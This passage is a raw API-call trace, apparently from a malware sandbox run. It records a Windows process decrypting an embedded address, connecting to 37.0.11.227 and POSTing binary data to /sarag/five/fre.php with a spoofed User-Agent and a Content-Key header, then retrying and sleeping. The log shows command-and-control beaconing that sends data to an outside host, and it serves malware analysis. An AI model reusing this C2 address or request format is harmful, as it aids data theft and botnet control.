dwFlags=0x0) returned 1 [0183.530] GetProcessHeap () returned 0x690000 [0183.530] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0183.531] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0183.531] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0183.532] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0183.532] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0183.533] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0183.533] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0183.533] GetProcessHeap () returned 0x690000 [0183.533] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0183.534] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0183.534] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0183.535] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0183.535] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0183.536] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0183.536] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0183.536] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0183.537] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0183.537] GetProcessHeap () returned 0x690000 [0183.537] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0183.537] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a9ed8*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeac0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0183.537] GetProcessHeap () returned 0x690000 [0183.537] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab430 [0183.537] socket (af=2, type=1, protocol=6) returned 0x30c [0183.537] connect (s=0x30c, name=0x6aeac0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0183.564] FreeAddrInfoW (pAddrInfo=0x6a9ed8*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeac0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0183.564] GetProcessHeap () returned 0x690000 [0183.564] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0183.564] GetProcessHeap () returned 0x690000 [0183.564] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b27b0 [0183.565] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0183.566] wvsprintfA (in: param_1=0x6b27b0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0183.566] GetProcessHeap () returned 0x690000 [0183.566] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afbc0 [0183.566] GetProcessHeap () returned 0x690000 [0183.567] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 [0183.567] GetProcessHeap () returned 0x690000 [0183.567] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0183.567] GetProcessHeap () returned 0x690000 [0183.567] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b27b0 [0183.568] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0183.569] wvsprintfA (in: param_1=0x6b27b0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0183.569] GetProcessHeap () returned 0x690000 [0183.569] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6abd08 [0183.569] GetProcessHeap () returned 0x690000 [0183.569] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 [0183.569] send (s=0x30c, buf=0x6abd08*, len=242, flags=0) returned 242 [0183.570] send (s=0x30c, buf=0x6aba40*, len=159, flags=0) returned 159 [0183.570] GetProcessHeap () returned 0x690000 [0183.570] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b27b0 [0183.570] recv (in: s=0x30c, buf=0x6b27b0, len=4048, flags=0 | out: buf=0x6b27b0*) returned 204 [0183.657] GetProcessHeap () returned 0x690000 [0183.657] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0183.658] GetProcessHeap () returned 0x690000 [0183.658] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0183.658] GetProcessHeap () returned 0x690000 [0183.659] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afbc0 | out: hHeap=0x690000) returned 1 [0183.659] GetProcessHeap () returned 0x690000 [0183.659] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0183.659] closesocket (s=0x30c) returned 0 [0183.659] GetProcessHeap () returned 0x690000 [0183.659] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab430 | out: hHeap=0x690000) returned 1 [0183.659] GetProcessHeap () returned 0x690000 [0183.660] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0183.660] GetProcessHeap () returned 0x690000 [0183.660] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0183.660] GetProcessHeap () returned 0x690000 [0183.660] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0183.660] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b27b0, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x7a0) returned 0x30c [0183.666] Sleep (dwMilliseconds=0xea60) [0183.668] GetProcessHeap () returned 0x690000 [0183.668] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a3fe0 [0183.668] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0183.669] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0183.774] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0183.775] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0183.785] GetProcessHeap () returned 0x690000 [0183.785] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a30 [0183.797] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0183.798] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8a30, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d028) returned 1 [0183.798] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0183.799] CryptSetKeyParam (hKey=0x69d028, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0183.800] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0183.800] CryptSetKeyParam (hKey=0x69d028, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0183.800] GetProcessHeap () returned 0x690000 [0183.800] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a30 | out: hHeap=0x690000) returned 1 [0183.801] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0183.802] CryptDecrypt (in: hKey=0x69d028, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a3fe0, pdwDataLen=0x19fcfc | out: pbData=0x6a3fe0, pdwDataLen=0x19fcfc) returned 1 [0183.803] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0183.803] CryptDestroyKey (hKey=0x69d028) returned 1 [0183.804] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0183.804] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0183.804] GetProcessHeap () returned 0x690000 [0183.804] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0183.805] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0183.805] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0183.806] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0183.806] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0183.807] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0183.807] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0183.808] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0183.808] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0183.808] GetProcessHeap () returned 0x690000 [0183.809] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0183.809] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0183.809] GetProcessHeap () returned 0x690000 [0183.809] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0183.809] GetProcessHeap () returned 0x690000 [0183.810] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0183.810] GetProcessHeap () returned 0x690000 [0183.810] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0183.810] GetProcessHeap () returned 0x690000 [0183.810] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0183.813] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0183.814] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0183.827] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0183.827] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aedd0) returned 1 [0183.837] GetProcessHeap () returned 0x690000 [0183.837] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88e0 [0183.837] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0183.838] CryptImportKey (in: hProv=0x6aedd0, pbData=0x6a88e0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0183.839] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0183.839] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0183.840] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0183.840] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0183.840] GetProcessHeap () returned 0x690000 [0183.840] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88e0 | out: hHeap=0x690000) returned 1 [0183.842] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0183.843] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0183.843] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0183.844] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0183.844] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0183.845] CryptReleaseContext (hProv=0x6aedd0, dwFlags=0x0) returned 1 [0183.845] GetProcessHeap () returned 0x690000 [0183.845] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0183.845] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0183.846] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0183.846] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0183.847] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0183.847] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0183.848] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0183.848] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0183.849] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0183.849] GetProcessHeap () returned 0x690000 [0183.849] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0183.849] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a9a78*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae988*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0183.849] GetProcessHeap () returned 0x690000 [0183.849] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab420 [0183.849] socket (af=2, type=1, protocol=6) returned 0x310 [0183.850] connect (s=0x310, name=0x6ae988*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0183.876] FreeAddrInfoW (pAddrInfo=0x6a9a78*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae988*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0183.876] GetProcessHeap () returned 0x690000 [0183.876] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aeee0 [0183.876] GetProcessHeap () returned 0x690000 [0183.876] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b27b0 [0183.877] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0183.878] wvsprintfA (in: param_1=0x6b27b0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0183.878] GetProcessHeap () returned 0x690000 [0183.878] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afb00 [0183.878] GetProcessHeap () returned 0x690000 [0183.879] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 [0183.879] GetProcessHeap () returned 0x690000 [0183.879] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0183.879] GetProcessHeap () returned 0x690000 [0183.879] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b27b0 [0183.880] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0183.881] wvsprintfA (in: param_1=0x6b27b0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0183.881] GetProcessHeap () returned 0x690000 [0183.881] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6abd08 [0183.881] GetProcessHeap () returned 0x690000 [0183.882] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 [0183.882] send (s=0x310, buf=0x6abd08*, len=242, flags=0) returned 242 [0183.883] send (s=0x310, buf=0x6aba40*, len=159, flags=0) returned 159 [0183.883] GetProcessHeap () returned 0x690000 [0183.883] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b27b0 [0183.883] recv (in: s=0x310, buf=0x6b27b0, len=4048, flags=0 | out: buf=0x6b27b0*) returned 204 [0183.962] GetProcessHeap () returned 0x690000 [0183.963] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0183.963] GetProcessHeap () returned 0x690000 [0183.963] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0183.964] GetProcessHeap () returned 0x690000 [0183.964] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afb00 | out: hHeap=0x690000) returned 1 [0183.965] GetProcessHeap () returned 0x690000 [0183.965] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeee0 | out: hHeap=0x690000) returned 1 [0183.965] closesocket (s=0x310) returned 0 [0183.966] GetProcessHeap () returned 0x690000 [0183.966] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab420 | out: hHeap=0x690000) returned 1 [0183.966] GetProcessHeap () returned 0x690000 [0183.966] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0183.966] GetProcessHeap () returned 0x690000 [0183.967] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0183.967] GetProcessHeap () returned 0x690000 [0183.967] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0183.967] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b27b0, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x2e4) returned 0x310 [0183.969] Sleep (dwMilliseconds=0xea60) [0183.971] GetProcessHeap () returned 0x690000 [0183.971] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0183.972] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0183.972] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0183.979] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0183.980] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af100) returned 1 [0183.985] GetProcessHeap () returned 0x690000 [0183.985] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0183.986] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0183.986] CryptImportKey (in: hProv=0x6af100, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0183.989] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0183.989] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0183.990] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0183.990] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0183.990] GetProcessHeap () returned 0x690000 [0183.990] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0183.991] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0183.991] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0183.992] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0183.993] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0183.993] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0183.994] CryptReleaseContext (hProv=0x6af100, dwFlags=0x0) returned 1 [0183.994] GetProcessHeap () returned 0x690000 [0183.994] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0183.995] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0184.001] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0184.005] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0184.006] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0184.006] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0184.007] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0184.011] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0184.012] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0184.012] GetProcessHeap () returned 0x690000 [0184.012] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0184.012] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0184.012] GetProcessHeap () returned 0x690000 [0184.012] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0184.013] GetProcessHeap () returned 0x690000 [0184.013] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0184.016] GetProcessHeap () returned 0x690000 [0184.016] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0184.016] GetProcessHeap () returned 0x690000 [0184.016] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0184.017] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0184.017] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0184.025] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0184.026] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0184.033] GetProcessHeap () returned 0x690000 [0184.033] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88e0 [0184.033] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0184.034] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a88e0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0184.034] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0184.037] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0184.038] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0184.038] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0184.038] GetProcessHeap () returned 0x690000 [0184.038] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88e0 | out: hHeap=0x690000) returned 1 [0184.039] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0184.039] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0184.040] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0184.041] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0184.041] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0184.042] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0184.042] GetProcessHeap () returned 0x690000 [0184.042] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0184.043] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0184.044] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0184.050] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0184.051] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0184.052] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 